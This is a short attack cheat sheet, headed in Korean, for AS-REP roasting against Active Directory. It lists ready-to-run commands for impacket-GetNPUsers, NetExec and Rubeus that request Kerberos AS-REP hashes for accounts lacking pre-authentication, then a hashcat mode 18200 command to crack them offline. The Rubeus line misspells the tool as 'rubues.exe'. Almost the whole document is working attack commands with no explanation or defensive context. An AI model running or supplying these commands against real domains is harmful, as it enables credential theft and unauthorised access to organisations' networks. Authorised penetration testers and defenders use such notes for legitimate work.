설명

공격

impacket-GetNPUsers

impacket-GetNPUsers -dc-ip $IP [domain]/[user]:[password] -request -format hashcat
impacket-GetNPUsers -dc-ip $IP [domain]/[user]:[password] -request -format john
impacket-GetNPUsers [domain]/ -dc-ip $IP -usersfile [wordlist] -format hashcat -outputfile [file] -no-pass

NetExec

nxc ldap -dc-ip $IP -u $USER -p '' --asreproast asreproast.out
nxc ldap -dc-ip $IP -u $USER -p $PWD --asreproast asreproast.out

Rubeus

rubues.exe asreproast /nowrap

# Insert 23$ after $krb5asrep$
hashcat -m 18200 -a 0 [hash] [wordlist]